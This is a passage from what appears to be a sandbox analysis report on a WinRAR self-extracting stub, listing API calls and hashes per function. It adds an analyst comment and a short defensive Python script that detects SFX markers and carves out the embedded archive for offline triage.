    • Instruction Fuzzy Hash: FB420970A44244BEFB219BA0DD4AFFE77BCAB11700F04416AF645B64D2CBB45E84DB62

    Control-flow Graph: function 000C1B7C-000C211E (the rendered graph is not reproduced here; the API calls it makes are listed under APIs below)
    APIs
    • GetModuleHandleW.KERNEL32(kernel32), ref: 000C1B95
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000C1BA7
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000C1BD8
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000C1E82
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1E9C
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C1EAC
    • ReadFile.KERNEL32(00000000,?,00007FFE,000E4D24,00000000), ref: 000C1ECA
    • CloseHandle.KERNEL32(00000000), ref: 000C1F22
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000C1F37
    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,000E4D24,?,00000000,?,00000800), ref: 000C1F8B
    • GetFileAttributesW.KERNEL32(?,?,000E4D24,00000800,?,00000000,?,00000800), ref: 000C1FB5
    • GetFileAttributesW.KERNEL32(?,?,000E4DEC,00000800), ref: 000C1FF1
      • Part of subcall function 000C1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000C1B4F
      • Part of subcall function 000C1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,000C0633,Crypt32.dll,00000000,000C06AD,00000200,?,000C0690,00000000,00000000,?), ref: 000C1B71
    • _swprintf.LIBCMT ref: 000C2063
    • _swprintf.LIBCMT ref: 000C20AF
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • AllocConsole.KERNEL32 ref: 000C20B7
    • GetCurrentProcessId.KERNEL32 ref: 000C20C1
    • AttachConsole.KERNEL32(00000000), ref: 000C20C8
    • _wcslen.LIBCMT ref: 000C20DD
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000C20EE
    • WriteConsoleW.KERNEL32(00000000), ref: 000C20F5
    • Sleep.KERNEL32(00002710), ref: 000C2100
    • FreeConsole.KERNEL32 ref: 000C2106
    • ExitProcess.KERNEL32 ref: 000C210E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
    • API String ID: 1207345701-3298887752
    • Opcode ID: 8fd3049383647f3e9c247a51b6be20a9ff7ac925fb3b9e0580b56ad2d42fd43d
    • Instruction ID: 33793d96a8474c3df73ca014511ca409fff0092f18a2fb95172a63340e41dcf7
    • Opcode Fuzzy Hash: 8fd3049383647f3e9c247a51b6be20a9ff7ac925fb3b9e0580b56ad2d42fd43d
    • Instruction Fuzzy Hash: FFD151B14083C49FD7309F52DC88FDFB6E8BB85709F500D2DF685AA251DBB885498B92
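    Two of the functions above are the WinRAR SFX stub's own plumbing rather than anything specific to this sample. The dialog function at 000CC9C5 probes write access with __tmp_rar_sfx_access_check_%u files, builds the re-launch command line -el -s2 "-d%s" "-sp%s", creates the winrarsfxmappingfile.tmp file mapping and copies its command line into it, which is consistent with the stub handing its parameters to a second, elevated instance of itself (the function at 000CF08B reads the same mapping back with OpenFileMappingW). The function at 000C1B7C resolves SetDllDirectoryW and SetDefaultDllDirectories through GetProcAddress, then checks its own folder for DXGIDebug.dll, dwmapi.dll and uxtheme.dll and refuses to run ("Please remove %s from %s folder. It is unsecure to run %s until it is done.") if one is planted there: that is the stub's defence against DLL sideloading, not evasion. The practical consequence for triage is that the stub is a known-good shell and the interesting content is the appended archive and its SFX script, so the sample should be carved and listed offline rather than judged by the stub's API profile. The Python below is an added example, not code from the report or from WinRAR: it scans a file for the marker strings seen in this trace (in both ASCII and UTF-16LE, since the stub passes them to the W APIs) and locates the embedded RAR 4.x or RAR 5 archive by signature so it can be written out for a normal archiver. The sample bytes are constructed and the trailing "archive body" is a placeholder, not a real RAR header.

```python
"""Added example: offline triage of a suspected WinRAR SFX executable."""
from __future__ import annotations

import hashlib

# Marker strings taken from the SFX stub's API trace above.
SFX_MARKERS = [
    "winrarsfxmappingfile.tmp",
    "__tmp_rar_sfx_access_check_",
    "RarHtmlClassName",
    "STARTDLG",
    "LICENSEDLG",
    "Please remove %s from %s folder",  # the DLL-planting refusal message
]
# Archive signatures: RAR 1.5 to 4.x, and RAR 5.0 (they differ in the seventh byte).
RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"


def find_markers(data: bytes) -> dict[str, list[str]]:
    """Map each marker found in data to the encodings it was found in."""
    hits = {}
    for marker in SFX_MARKERS:
        encodings = [name for name, encoded in (("ascii", marker.encode("ascii")),
                                                ("utf-16le", marker.encode("utf-16-le")))
                     if encoded in data]
        if encodings:
            hits[marker] = encodings
    return hits


def find_archive(data: bytes) -> tuple[int, str] | None:
    """Return (offset, format) of the earliest embedded RAR signature, or None."""
    candidates = [(data.find(RAR5_SIG), "rar5"), (data.find(RAR4_SIG), "rar4")]
    candidates = [(off, fmt) for off, fmt in candidates if off >= 0]
    return min(candidates) if candidates else None


def carve_archive(data: bytes) -> bytes:
    """Return the embedded archive bytes (from the signature to end of file), or b''."""
    arc = find_archive(data)
    return data[arc[0]:] if arc else b""


def triage(data: bytes) -> dict:
    """Summarise what the file looks like without executing it."""
    is_pe = data[:2] == b"MZ"
    markers = find_markers(data)
    arc = find_archive(data)
    payload = carve_archive(data)
    return {
        "is_pe": is_pe,
        "sfx_markers": sorted(markers),
        "archive_offset": arc[0] if arc else None,
        "archive_format": arc[1] if arc else None,
        "archive_sha256": hashlib.sha256(payload).hexdigest() if payload else None,
        # A PE carrying the stub's strings plus an appended RAR is the SFX shape we expect.
        "verdict": "winrar-sfx" if (is_pe and markers and arc) else "unknown",
    }


# Constructed stand-in for a stub: fake PE prefix, two UTF-16LE markers, the ASCII
# refusal message, padding, then a RAR5 signature followed by placeholder bytes.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + "winrarsfxmappingfile.tmp".encode("utf-16-le") + b"\x00\x00"
    + "STARTDLG".encode("utf-16-le") + b"\x00\x00"
    + b"Please remove %s from %s folder. It is unsecure to run %s until it is done.\x00"
    + b"\x00" * 16
    + RAR5_SIG + b"<constructed archive body>"
)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    report = triage(blob)
    print(report)
    if report["archive_offset"] is not None and len(sys.argv) > 2:
        with open(sys.argv[2], "wb") as fh:
            fh.write(carve_archive(blob))
```

    Run as `python triage.py sample.exe carved.rar` and list the carved archive with an archiver of your choice; the SFX script (Setup=, Silent=, Path= and similar commands) lives in the archive comment and is what determines what the stub will run, so that is the part worth reading. The marker scan is a shape check only: a different packer can reuse the same strings, and a custom stub can omit them.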
    APIs
    • __EH_prolog.LIBCMT ref: 000BED90
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000BEDCC
      • Part of subcall function 000BD6A7: _wcslen.LIBCMT ref: 000BD6AF
      • Part of subcall function 000C1900: _wcslen.LIBCMT ref: 000C1906
      • Part of subcall function 000C2EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000BCF18,00000000,?,?), ref: 000C2EDE
    • _wcslen.LIBCMT ref: 000BF109
    • __fprintf_l.LIBCMT ref: 000BF23C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
    • API String ID: 566448164-801612888
    • Opcode ID: 56e4761fb3a43d17ce275860e0529853dc82da963d44fd585ee0a225eaa47eb7
    • Instruction ID: fe28a8323e7e4cf7ca7f64816e7038815ba9ac81d943b196a7d09982afdf7308
    • Opcode Fuzzy Hash: 56e4761fb3a43d17ce275860e0529853dc82da963d44fd585ee0a225eaa47eb7
    • Instruction Fuzzy Hash: 6D32D07190025AABCB24EF68CC45BFE77A4FF08710F40456AFA06A7292EB71DD85CB54

    Control-flow Graph: function 000CAEE5-000CB024 (the rendered graph is not reproduced here; the API calls it makes are listed under APIs below)
    APIs
    • ShowWindow.USER32(?,00000000), ref: 000CAEFE
      • Part of subcall function 000CAC14: LoadCursorW.USER32(00000000,00007F00), ref: 000CAC4B
      • Part of subcall function 000CAC14: RegisterClassExW.USER32(00000030), ref: 000CAC6C
    • GetWindowRect.USER32(?,?), ref: 000CAF54
    • GetParent.USER32(?), ref: 000CAF62
    • MapWindowPoints.USER32(00000000,00000000), ref: 000CAF6B
    • DestroyWindow.USER32(00000000), ref: 000CAF7A
    • GetParent.USER32(?), ref: 000CAF97
    • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 000CAFBB
    • ShowWindow.USER32(?,00000005,00000000), ref: 000CAFF1
    • SetWindowTextW.USER32(?,00000000), ref: 000CAFF9
    • ShowWindow.USER32(00000000,00000005), ref: 000CB00F
    • UpdateWindow.USER32(00000000), ref: 000CB018
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: same seven module dumps (000B0000, 000E4000, 000F0000, 000F3000, 000F5000, 00114000, 00115000) as listed in the first entry above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
    • String ID: RarHtmlClassName
    • API String ID: 3841971108-1658105358
    • Opcode ID: ae490925c7e2ccfe1866ad2dd38a6eab046b8721fbde5f569c580bb183f1e024
    • Instruction ID: fe7e1fe3875a27997044cc93d94774a544791b8a556bb6d6a99d2115bd74c2fe
    • Opcode Fuzzy Hash: ae490925c7e2ccfe1866ad2dd38a6eab046b8721fbde5f569c580bb183f1e024
    • Instruction Fuzzy Hash: D741DC72104208FFCB269F64DD49FAF7BE9EB48305F24865DF84999052DB70D840CB62

    Control-flow Graph

    APIs
      • Part of subcall function 000CC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CC759
      • Part of subcall function 000CC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000CC76A
      • Part of subcall function 000CC748: IsDialogMessageW.USER32(000103E6,?), ref: 000CC77E
      • Part of subcall function 000CC748: TranslateMessage.USER32(?), ref: 000CC78C
      • Part of subcall function 000CC748: DispatchMessageW.USER32(?), ref: 000CC796
    • GetDlgItem.USER32(00000068,00111CF0), ref: 000CE61B
    • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,000CC999,000E60F0,00111CF0,00111CF0,00001000,000F30C4,00000000,?), ref: 000CE643
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000CE64E
    • SendMessageW.USER32(00000000,000000C2,00000000,000E45F4), ref: 000CE65C
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000CE672
    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000CE68C
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000CE6D0
    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000CE6DE
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000CE6ED
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000CE714
    • SendMessageW.USER32(00000000,000000C2,00000000,000E549C), ref: 000CE723
      • Part of subcall function 000CA235: DestroyWindow.USER32(?,00000000,000CE640,?,?,00000001,?,?,000CC999,000E60F0,00111CF0,00111CF0,00001000,000F30C4,00000000,?), ref: 000CA241
    Strings
    Similarity
    • API ID: Message$Send$Window$CallbackDestroyDialogDispatchDispatcherItemPeekShowTranslateUser
    • String ID: \
    • API String ID: 3039329835-2967466578
    • Opcode ID: 9c225a9cc58002d7e1fb5210a6b73be74a9f4fc266cbb3802abf7e185e27a8f3
    • Instruction ID: f196c5e5a94a22e8f00acb054cb44005c2c9cac0792eabd8bcb43fed3e429427
    • Opcode Fuzzy Hash: 9c225a9cc58002d7e1fb5210a6b73be74a9f4fc266cbb3802abf7e185e27a8f3
    • Instruction Fuzzy Hash: 9131D3B1245B40BFE302DF30DC4AFAF3FADEB82704F00090DF6A196191C76559048B66

    Control-flow Graph

    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000D6AF9,000D6AF9,?,?,?,000DBD5C,00000001,00000001,62E85006), ref: 000DBB65
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000DBD5C,00000001,00000001,62E85006,?,?,?), ref: 000DBBEB
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000DBCE5
    • __freea.LIBCMT ref: 000DBCF2
      • Part of subcall function 000DA7EE: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    • __freea.LIBCMT ref: 000DBCFB
    • __freea.LIBCMT ref: 000DBD20
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocateHeap
    • String ID:
    • API String ID: 1414292761-0
    • Opcode ID: 7a0cabda5998727025c03a98e0ca9f57c73e9435958b49b2fae3ccf1af978078
    • Instruction ID: 08a4bb6bae2694087b6452419547013b707c923d8b7872db2c8048c9e97be351
    • Opcode Fuzzy Hash: 7a0cabda5998727025c03a98e0ca9f57c73e9435958b49b2fae3ccf1af978078
    • Instruction Fuzzy Hash: 6051C072610316EAEB258F65CC82EBE77AAEF44760F26466AFD05D6241EB34DC408670

    Control-flow Graph

    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,S,00000000,00000000,?,000DBE8B,S,00000000,00000000,00000000,?,000DC088,00000006,FlsSetValue), ref: 000DBF16
    • GetLastError.KERNEL32(?,000DBE8B,S,00000000,00000000,00000000,?,000DC088,00000006,FlsSetValue,000E8A00,FlsSetValue,00000000,00000364,?,000DA5D7), ref: 000DBF22
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000DBE8B,S,00000000,00000000,00000000,?,000DC088,00000006,FlsSetValue,000E8A00,FlsSetValue,00000000), ref: 000DBF30
    Strings
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: S
    • API String ID: 3177248105-186050230
    • Opcode ID: b8a3762d9c74bcab84976999722b016bd2c867e4a60c83b636b224a06ffa514d
    • Instruction ID: 559fe28afadad67cb3657ff33cbe5a4227e8aec82672f63c819c8e5a4aab664d
    • Opcode Fuzzy Hash: b8a3762d9c74bcab84976999722b016bd2c867e4a60c83b636b224a06ffa514d
    • Instruction Fuzzy Hash: A701F732715322DBD7314B68EC84A5B77D8AF45BA17124631FA1AE7380CB24D800CAF0

    Control-flow Graph

    APIs
    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,000B8243,?,00000005,?,00000011), ref: 000BABBF
    • GetLastError.KERNEL32(?,?,000B8243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000BABCC
    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,000B8243,?,00000005,?), ref: 000BAC02
    • GetLastError.KERNEL32(?,?,000B8243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000BAC0A
    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000B8243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000BAC59
    Similarity
    • API ID: File$CreateErrorLast$Time
    • String ID:
    • API String ID: 1999340476-0
    • Opcode ID: caea7c931718d942fa29da9b1d162e304e5fbb68e8ed158d31619fabac46e6ce
    • Instruction ID: 46f1ea93af9e9ae03945aa68294bf084e813f1e4ec48ee4409c1929f707e10af
    • Opcode Fuzzy Hash: caea7c931718d942fa29da9b1d162e304e5fbb68e8ed158d31619fabac46e6ce
    • Instruction Fuzzy Hash: FA315B30644785BFE7309F24DC45BDABBD5BB06320F100B29F9B0961D2C7B5A848CB96

    Control-flow Graph

    APIs
      • Part of subcall function 000C24DF: ResetEvent.KERNEL32(?), ref: 000C24F1
      • Part of subcall function 000C24DF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000C2505
    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 000C223A
    • CloseHandle.KERNEL32(?,?), ref: 000C2254
    • DeleteCriticalSection.KERNEL32(?), ref: 000C226D
    • CloseHandle.KERNEL32(?), ref: 000C2279
    • CloseHandle.KERNEL32(?), ref: 000C2285
      • Part of subcall function 000C22FC: WaitForSingleObject.KERNEL32(?,000000FF,000C2419,?,?,000C248F,?,?,?,?,?,000C2479), ref: 000C2302
      • Part of subcall function 000C22FC: GetLastError.KERNEL32(?,?,000C248F,?,?,?,?,?,000C2479), ref: 000C230E
    Similarity
    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
    • String ID:
    • API String ID: 1868215902-0
    • Opcode ID: 1f72b55af14e393d3a44cc143078351dc9bdd172c0a7ebb2449124b667708515
    • Instruction ID: 5ae8133f38bdc998e8658db54b2ee31ed8892300795e3fabfff5fc9b11f27b27
    • Opcode Fuzzy Hash: 1f72b55af14e393d3a44cc143078351dc9bdd172c0a7ebb2449124b667708515
    • Instruction Fuzzy Hash: C9017572400784EFD7229B64DD85FC6BBA9FB08B10F00093DF26A62560CB756954CB50

    Control-flow Graph

    APIs
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CC759
    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000CC76A
    • IsDialogMessageW.USER32(000103E6,?), ref: 000CC77E
    • TranslateMessage.USER32(?), ref: 000CC78C
    • DispatchMessageW.USER32(?), ref: 000CC796
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherPeekTranslateUser
    • String ID:
    • API String ID: 3531142305-0
    • Opcode ID: d4828ffdaf1b602a01ba8904f7758241874362212c7350875f99d151ef285da7
    • Instruction ID: 4e3a1bbf00a3e8aab01c61776e6c74bb5e87ee829624a2e78d598b5a4bd3816e
    • Opcode Fuzzy Hash: d4828ffdaf1b602a01ba8904f7758241874362212c7350875f99d151ef285da7
    • Instruction Fuzzy Hash: 32F01D71D01229AB9B249BE1DD4CEDF7FACEF493907008015B50AD2000E774E505CBF0

    Control-flow Graph

    APIs
    • GetClassNameW.USER32(?,?,00000050), ref: 000CBBC7
    • SHAutoComplete.SHLWAPI(?,00000010), ref: 000CBBFE
      • Part of subcall function 000C3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,000BD523,00000000,.exe,?,?,00000800,?,?,?,000C9E4C), ref: 000C331C
    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 000CBBEE
    Strings
    Similarity
    • API ID: AutoClassCompareCompleteFindNameStringWindow
    • String ID: EDIT
    • API String ID: 4243998846-3080729518
    • Opcode ID: ea670d9a9bc87e1f9540af897223cd1f0db164dd4bebca84de53d0f7f20160b4
    • Instruction ID: 4b003d8c22bffb3f9de37a7dd065137c65eee72ff2f1539772adce87c7d4b4c7
    • Opcode Fuzzy Hash: ea670d9a9bc87e1f9540af897223cd1f0db164dd4bebca84de53d0f7f20160b4
    • Instruction Fuzzy Hash: 1FF08232600629BBDB2057A69C0AFEF76ACAB86B40F444059BA40B6184DBA4DA41C5B5

    Control-flow Graph

    APIs
      • Part of subcall function 000C1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000C1B4F
      • Part of subcall function 000C1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,000C0633,Crypt32.dll,00000000,000C06AD,00000200,?,000C0690,00000000,00000000,?), ref: 000C1B71
    • OleInitialize.OLE32(00000000), ref: 000CBD24
    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000CBD5B
    • SHGetMalloc.SHELL32(000FA460), ref: 000CBD65
    Strings
    Similarity
    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
    • String ID: riched20.dll
    • API String ID: 3498096277-3360196438
    • Opcode ID: 6d5dc9ace9ca346de89cda833ca7294de9db1cda5deddb56759b2b1bc946ea0a
    • Instruction ID: 6a049aeeb54a6d792fdd2a20e96d877cfc9560f8e9061a0b50e8216bdddcb630
    • Opcode Fuzzy Hash: 6d5dc9ace9ca346de89cda833ca7294de9db1cda5deddb56759b2b1bc946ea0a
    • Instruction Fuzzy Hash: 4DF049B1D00209ABCB10AF99D949AEFFFFCEF84304F00801AE911A2251DBB45645CBA1

    Control-flow Graph

    APIs
    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000CED34
    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000CED70
    Strings
    Similarity
    • API ID: EnvironmentVariable
    • String ID: sfxcmd$sfxpar
    • API String ID: 1431749950-3493335439
    • Opcode ID: 976ec165a21c1ac412d35e1bcf591e0172fc415b535a8a544719a7c9bec56587
    • Instruction ID: 599c3ef8c712d4e4352f4a95c471cf74626fa48c09ab1f3127cb1139061c9f8d
    • Opcode Fuzzy Hash: 976ec165a21c1ac412d35e1bcf591e0172fc415b535a8a544719a7c9bec56587
    • Instruction Fuzzy Hash: F1F0E5B2404274ABDB312B91DC05FFE7B9CEF26B82B044099BD46AA053E775C880C7B1

    Control-flow Graph

    APIs
    • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,000D4D43,00000000,00000001,001140C4,?,?,?,000D4EE6,00000004,InitializeCriticalSectionEx,000E7424,InitializeCriticalSectionEx), ref: 000D4D9F
    • GetLastError.KERNEL32(?,000D4D43,00000000,00000001,001140C4,?,?,?,000D4EE6,00000004,InitializeCriticalSectionEx,000E7424,InitializeCriticalSectionEx,00000000,?,000D4C9D), ref: 000D4DA9
    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,000D3BE3), ref: 000D4DD1
    Strings
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    • Opcode ID: 2bc6f9f0acb8b03c2f4902d069a108cbf88a8bbfb8e7482e2bde5f40dfb45994
    • Instruction ID: 7f2017cfe4aa35f8c7654786ac6ca977e559546b3b404e1edd57da4a68a770e9
    • Opcode Fuzzy Hash: 2bc6f9f0acb8b03c2f4902d069a108cbf88a8bbfb8e7482e2bde5f40dfb45994
    • Instruction Fuzzy Hash: C1E0DF30A80348BBEF501F60EC46B593F9AAB10F60F100021FA0DBC5E0EBB2996095A0

    APIs
    • GetStdHandle.KERNEL32(000000F6), ref: 000BA9F5
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 000BAA0D
    • GetLastError.KERNEL32 ref: 000BAA3F
    • GetLastError.KERNEL32 ref: 000BAA5E
    Similarity
    • API ID: ErrorLast$FileHandleRead
    • String ID:
    • API String ID: 2244327787-0
    • Opcode ID: 1f51d051a8ff9d4693b0072abb4673505da0f1b4d6140610054958927b5d9329
    • Instruction ID: 5d5b7ff6e8d7dd04e6b920f3a8e5f54c8e80a8c6637e835bcab6a65dd45935c9
    • Opcode Fuzzy Hash: 1f51d051a8ff9d4693b0072abb4673505da0f1b4d6140610054958927b5d9329
    • Instruction Fuzzy Hash: 2D118B31B00204EBDF709F64DA44AEE37E9FB07760F10462AF92695290DB789E44DB63

    APIs
    • FreeLibrary.KERNEL32(00000000,00000001,001140C4,?,?,?,000D4EE6,00000004,InitializeCriticalSectionEx,000E7424,InitializeCriticalSectionEx,00000000,?,000D4C9D,001140C4,00000FA0), ref: 000D4D75
    • GetProcAddress.KERNEL32(00000000,?), ref: 000D4D7F
    Strings
    Similarity
    • API ID: AddressFreeLibraryProc
    • String ID: ;
    • API String ID: 3013587201-2788296473
    • Opcode ID: 28ce03993095ab7e35a27305f90eaebf1e208a266c3bb5378f66f4062a89446a
    • Instruction ID: ca74144176a2445a371d7b4bd4b849ea3e23303180e5cb723466e4275169e167
    • Opcode Fuzzy Hash: 28ce03993095ab7e35a27305f90eaebf1e208a266c3bb5378f66f4062a89446a
    • Instruction Fuzzy Hash: FC119331600715AF9F26CFA4DC8099D73E6FF86B50725016AEA15DB310E730DD41CBA0

    APIs
    • CreateThread.KERNEL32(00000000,00010000,Function_00012470,?,00000000,00000000), ref: 000C235B
    • SetThreadPriority.KERNEL32(?,00000000), ref: 000C23A2
      • Part of subcall function 000B76E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B7707
    Strings
    Similarity
    • API ID: Thread$CreatePriority__vswprintf_c_l
    • String ID: CreateThread failed
    • API String ID: 2655393344-3849766595
    • Opcode ID: ec572fab175ec5a7cff789d2fc809b851f4919c7881effbbb04bbcf13d9571e0
    • Instruction ID: de4d70db1aac3cb2cd46fe7fd69f45d5a1e006c624a9cbf4742ccc2de08d9431
    • Opcode Fuzzy Hash: ec572fab175ec5a7cff789d2fc809b851f4919c7881effbbb04bbcf13d9571e0
    • Instruction Fuzzy Hash: 020149B134434A6FE3246F64DC81FB6B398EB40726F20023EF7866A4C1CEA4A840D620
    APIs
    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,000BE79B,00000001,?,?,?,00000000,000C66B2,?,?,?), ref: 000BB22E
    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,000C66B2,?,?,?,?,?,000C6174,?), ref: 000BB275
    • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,000BE79B,00000001,?,?), ref: 000BB2A1
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileWrite$Handle
    • String ID:
    • API String ID: 4209713984-0
    • Opcode ID: 817210a737ce63c0839bd9b3649ed042dc79732d6c4fff6d0a7718e93c46acb3
    • Instruction ID: 5da54f292f978ae9372b7bf83ffa450341386701034d11cd5afbf67745778389
    • Opcode Fuzzy Hash: 817210a737ce63c0839bd9b3649ed042dc79732d6c4fff6d0a7718e93c46acb3
    • Instruction Fuzzy Hash: AF31D231248345AFEB14CF10D858BEE77E5FB90B15F04461DFA916B290CBB4AD48CBA2
    APIs
      • Part of subcall function 000BD68B: _wcslen.LIBCMT ref: 000BD691
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB569
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB59C
    • GetLastError.KERNEL32(?,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB5B9
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
